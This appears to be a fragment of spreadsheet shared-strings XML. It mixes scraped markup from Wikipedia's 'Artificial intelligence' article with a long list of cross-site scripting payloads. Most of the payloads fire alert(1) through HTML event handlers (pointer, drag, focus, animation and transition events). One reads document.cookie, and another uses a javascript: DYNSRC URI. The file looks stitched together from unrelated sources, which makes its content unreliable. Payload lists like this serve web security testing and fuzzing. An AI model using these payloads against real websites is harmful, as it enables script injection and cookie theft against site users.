    <t xml:space="preserve">&lt;li id="cite_note-K-nearest_neighbor_algorithm-222"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-K-nearest_neighbor_algorithm_222-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;col onpointerover=alert(1)&gt;XSS&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;p onmouseup="alert(1)"&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-417"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-417"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;ins onmouseup="alert(1)"&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="AI_textbooks"&gt;AI textbooks </t>
  </si>
  <si>
    <t>&lt;table onpointerdown=alert(1)&gt;XSS&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;thead id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;dir ondrop=alert(1) contenteditable&gt;drop here&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;content style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;slot onblur=alert(1) tabindex=1 id=x&gt;&lt;/slot&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFMarkoff2011" class="citation news"&gt;Markoff, John (16 February 2011). &lt;a rel="nofollow" class="external text" href="https://www.nytimes.com/2011/02/17/science/17jeopardy-watson.html"&gt;"Computer Wins on 'Jeopardy!': Trivial, It's Not" &lt;/a&gt;. &lt;i&gt;The New York Times &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;25 October </t>
  </si>
  <si>
    <t>&lt;hr onpointerleave=alert(1)&gt;XSS&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;select id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;option onbeforecopy="alert(1)" contenteditable&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;object id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;em onmouseenter="alert(1)"&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onkeydown="alert(1)" contenteditable&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onpointerup=alert(1)&gt;XSS&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;details id=x tabindex=1 onactivate=alert(1)&gt;&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;datalist id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Pierre_Gassendi" title="Pierre Gassendi"&gt;Pierre Gassendi &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Artificial_brain" title="Artificial brain"&gt;Artificial brain &lt;/a&gt; arguments: AI requires a simulation of the operation of the human brain</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;xmp id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;data onmousemove="alert(1)"&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;tt id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;section draggable="true" ondragleave="alert(1)"&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;frameset style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;aside id=x tabindex=1 onfocus=alert(1)&gt;&lt;/aside&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://www.economist.com/news/leaders/21740735-humans-have-had-good-run-most-recent-breakthrough-robotics-it-clear"&gt;"IKEA furniture and the limits of AI" &lt;/a&gt;. &lt;i&gt;The Economist &lt;/i&gt;. 2018&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;24 April </t>
  </si>
  <si>
    <t>&lt;script onpaste="alert(1)" contenteditable&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;s onmouseover="alert(1)"&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;summary oncontextmenu="alert(1)"&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;dialog draggable="true" ondragleave="alert(1)"&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onpointerdown=alert(1)&gt;XSS&lt;/marquee&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-310"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-310"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;marquee id=x tabindex=1 onactivate=alert(1)&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;image onpointerdown=alert(1)&gt;XSS&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;keygen id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/keygen&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;section draggable="true" ondragend="alert(1)"&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;aside onmousemove="alert(1)"&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFHutter2005"&gt;Hutter 2005 &lt;/a&gt;, pp.&amp;#160;125–126 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;908–915 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;marquee id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/marquee&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; (5th ed.). Benjamin/Cummings. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-8053-4780-7" title="Special:BookSources/978-0-8053-4780-7"&gt;&lt;bdi&gt;978-0-8053-4780-7 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Artificial+Intelligence%3A+Structures+and+Strategies+for+Complex+Problem+Solving&amp;amp;rft.edition=5th&amp;amp;rft.pub=Benjamin%2FCummings&amp;amp;rft.date=2004&amp;amp;rft.isbn=978-0-8053-4780-7&amp;amp;rft.aulast=Luger&amp;amp;rft.aufirst=George&amp;amp;rft.au=Stubblefield%2C+William&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fartificialintell0000luge&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;output style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onpointerenter=alert(1)&gt;XSS&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;dir oncopy="alert(1)" contenteditable&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;hr onmouseleave="alert(1)"&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;element ondrop=alert(1) contenteditable&gt;drop here&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset draggable="true" ondragleave="alert(1)"&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;474–505 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Related &lt;/th&gt;&lt;td class="navbox-list navbox-even" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;base onpointerup=alert(1)&gt;XSS&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;tr id=x tabindex=1 onfocus=alert(1)&gt;&lt;/tr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ul&gt;&lt;li&gt;&lt;span class="nowrap"&gt;&lt;a href="/wiki/Biblioth%C3%A8que_nationale_de_France" title="Bibliothèque nationale de France"&gt;BNF &lt;/a&gt;: &lt;span class="uid"&gt;&lt;a rel="nofollow" class="external text" href="https://catalogue.bnf.fr/ark:/12148/cb11932084t"&gt;cb11932084t &lt;/a&gt; &lt;a rel="nofollow" class="external text" href="https://data.bnf.fr/ark:/12148/cb11932084t"&gt;(data) &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;nav data-toggle="wy-nav-shift" class="wy-nav-side"&gt;</t>
  </si>
  <si>
    <t>&lt;dt ondblclick="alert(1)"&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onkeydown="alert(1)" contenteditable&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;picture id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onbeforepaste="alert(1)" contenteditable&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/3D_optical_data_storage" title="3D optical data storage"&gt;3D optical data storage &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;p onload=alert(1)&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onmouseenter="alert(1)"&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;data onmouseenter="alert(1)"&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onbeforecut=alert(1) autofocus&gt;XSS&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onpointerenter=alert(1)&gt;XSS&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;img src=validimage.png onloadend=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;strong onmousemove="alert(1)"&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;article style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;slot onpointerout=alert(1)&gt;XSS&lt;/slot&gt;</t>
  </si>
  <si>
    <t>=# onmouseover="alert(document.cookie)</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=CNN&amp;amp;rft.atitle=Are+Autonomous+Robots+Your+next+Surgeons%3F&amp;amp;rft.date=2016-05-12&amp;amp;rft.au=Senthilingam%2C+Meera&amp;amp;rft_id=http%3A%2F%2Fwww.cnn.com%2F2016%2F05%2F12%2Fhealth%2Frobot-surgeon-bowel-operation%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-375"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-375"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://www.wired.com/story/facebook-quietly-enters-starcraft-war-for-ai-bots-and-loses/"&gt;"Facebook Quietly Enters StarCraft War for AI Bots, and Loses" &lt;/a&gt;. &lt;i&gt;WIRED &lt;/i&gt;. 2017&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;7 May </t>
  </si>
  <si>
    <t>&lt;style onpointerup=alert(1)&gt;XSS&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onchange=alert(1)&gt;XSS&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" ondragstart="alert(1)"&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;base onpointerout=alert(1)&gt;XSS&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;center onload=alert(1)&gt;&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;animatetransform onpointerup=alert(1)&gt;XSS&lt;/animatetransform&gt;</t>
  </si>
  <si>
    <t>AI at &lt;a href="/wiki/MIT" class="mw-redirect" title="MIT"&gt;MIT &lt;/a&gt; under &lt;a href="/wiki/Marvin_Minsky" title="Marvin Minsky"&gt;Marvin Minsky &lt;/a&gt; in the 1960s&amp;#160;:</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;progress id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;svg style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;map oncut="alert(1)" contenteditable&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;time oncontextmenu="alert(1)"&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;strong draggable="true" ondragend="alert(1)"&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;th ondrop=alert(1) contenteditable&gt;drop here&lt;/th&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;span class="nowrap"&gt;&lt;a href="/wiki/Library_of_Congress_Control_Number" title="Library of Congress Control Number"&gt;LCCN &lt;/a&gt;: &lt;span class="uid"&gt;&lt;a rel="nofollow" class="external text" href="https://id.loc.gov/authorities/subjects/sh85008180"&gt;sh85008180 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;address onmouseup="alert(1)"&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;select id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/select&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;textarea id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;dir onpointerout=alert(1)&gt;XSS&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;453–505, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;acronym style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;li onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/li&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/canvas&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;tr onpointerleave=alert(1)&gt;XSS&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;rt style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;small onmouseup="alert(1)"&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=16" title="Edit section: Symbolic"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;IMG DYNSRC="javascript:alert('')"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;References </t>
  </si>
  <si>
    <t>&lt;b oncut="alert(1)" contenteditable&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;b onpointerout=alert(1)&gt;XSS&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;listing onmouseenter="alert(1)"&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Guardian&amp;amp;rft.atitle=Will+robots+create+more+jobs+than+they+destroy%3F&amp;amp;rft.date=2015-09-06&amp;amp;rft.aulast=Ford&amp;amp;rft.aufirst=Martin&amp;amp;rft.au=Colvin%2C+Geoff&amp;amp;rft_id=https%3A%2F%2Fwww.theguardian.com%2Ftechnology%2F2015%2Fsep%2F06%2Fwill-robots-create-destroy-jobs&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="magnify"&gt;&lt;a href="/wiki/File:ParseTree.svg" class="internal" title="Enlarge"&gt; &lt;/a&gt; &lt;/div&gt;A &lt;a href="/wiki/Parse_tree" title="Parse tree"&gt;parse tree &lt;/a&gt; represents the &lt;a href="/wiki/Syntax" title="Syntax"&gt;syntactic &lt;/a&gt; structure of a sentence according to some &lt;a href="/wiki/Formal_grammar" title="Formal grammar"&gt;formal grammar &lt;/a&gt;. &lt;/div&gt; &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;keygen ondblclick="alert(1)"&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/John_McCarthy_(computer_scientist)" title="John McCarthy (computer scientist)"&gt;McCarthy &lt;/a&gt; and AI research at &lt;a href="/wiki/Stanford_Artificial_Intelligence_Laboratory" class="mw-redirect" title="Stanford Artificial Intelligence Laboratory"&gt;SAIL &lt;/a&gt; and &lt;a href="/wiki/SRI_International" title="SRI International"&gt;SRI International &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;aside ondragover=alert(1) contenteditable&gt;drop here&lt;/aside&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;a href="/wiki/Affect_(psychology)" title="Affect (psychology)"&gt;affects &lt;/a&gt;.&lt;sup id="cite_ref-FOOTNOTEThro1993_140-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEThro1993-140"&gt;&amp;#91;137&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;form id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onpaste="alert(1)" contenteditable&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;meter onmouseenter="alert(1)"&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;The Librarian (&lt;i&gt;&lt;a href="/wiki/Snow_Crash" title="Snow Crash"&gt;Snow Crash &lt;/a&gt; &lt;/i&gt;, 1992) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;noembed draggable="true" ondragleave="alert(1)"&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;marquee draggable="true" ondragstart="alert(1)"&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;script id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;menu onpointermove=alert(1)&gt;XSS&lt;/menu&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;li id="footer-copyrightico"&gt;&lt;a href="https://wikimediafoundation.org/"&gt;&lt;img src="/static/images/wikimedia-button.png" srcset="/static/images/wikimedia-button-1.5x.png 1.5x, /static/images/wikimedia-button-2x.png 2x" width="88" height="31" alt="Wikimedia Foundation"/&gt; &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Are there limits to how intelligent machines—or human-machine hybrids—can be? A superintelligence, hyperintelligence, or superhuman intelligence is a hypothetical agent that would possess intelligence far surpassing that of the brightest and most gifted human mind. &lt;i&gt;Superintelligence &lt;/i&gt; may also refer to the form or degree of intelligence possessed by such an agent.&lt;sup id="cite_ref-Roberts_147-1" class="reference"&gt;&lt;a href="#cite_note-Roberts-147"&gt;&amp;#91;144&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;script id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;rp onpointerdown=alert(1)&gt;XSS&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;rb draggable="true" ondragenter="alert(1)"&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;bdi draggable="true" ondragleave="alert(1)"&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/bgsound&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;ins ondrop=alert(1) contenteditable&gt;drop here&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;pre onbeforepaste="alert(1)" contenteditable&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;td draggable="true" ondragenter="alert(1)"&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/K-nearest_neighbor_algorithm" class="mw-redirect" title="K-nearest neighbor algorithm"&gt;k-nearest neighbor algorithm &lt;/a&gt;,&lt;sup id="cite_ref-221" class="reference"&gt;&lt;a href="#cite_note-221"&gt;&amp;#91;g&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-K-nearest_neighbor_algorithm_222-0" class="reference"&gt;&lt;a href="#cite_note-K-nearest_neighbor_algorithm-222"&gt;&amp;#91;215&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;samp id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;strike onmouseover="alert(1)"&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="http://www.sciencemag.org/news/2017/07/ai-revolution-science"&gt;"The AI revolution in science" &lt;/a&gt;. &lt;i&gt;Science | AAAS &lt;/i&gt;. 5 July 2017&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;7 May </t>
  </si>
  <si>
    <t>&lt;var onkeypress="alert(1)" contenteditable&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://www.channelnewsasia.com/news/commentary/artificial-intelligence-big-data-bias-hiring-loans-key-challenge-11097374"&gt;"Commentary: Bad news. Artificial intelligence is biased" &lt;/a&gt;. &lt;i&gt;CNA &lt;/i&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=CNA&amp;amp;rft.atitle=Commentary%3A+Bad+news.+Artificial+intelligence+is+biased&amp;amp;rft_id=https%3A%2F%2Fwww.channelnewsasia.com%2Fnews%2Fcommentary%2Fartificial-intelligence-big-data-bias-hiring-loans-key-challenge-11097374&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;time onkeyup="alert(1)" contenteditable&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;abbr id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onkeydown="alert(1)" contenteditable&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Francisco_Varela" title="Francisco Varela"&gt;Francisco Varela &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;meta style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;dialog style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/dialog&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=Kismet&amp;amp;rft.pub=MIT+Artificial+Intelligence+Laboratory%2C+Humanoid+Robotics+Group&amp;amp;rft_id=http%3A%2F%2Fwww.ai.mit.edu%2Fprojects%2Fhumanoid-robotics-group%2Fkismet%2Fkismet.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEDreyfusDreyfus1986-107"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEDreyfusDreyfus1986_107-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;figcaption onmousemove="alert(1)"&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;video id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onpointermove=alert(1)&gt;XSS&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;noscript style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;rt draggable="true" ondragleave="alert(1)"&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-78"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-78"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
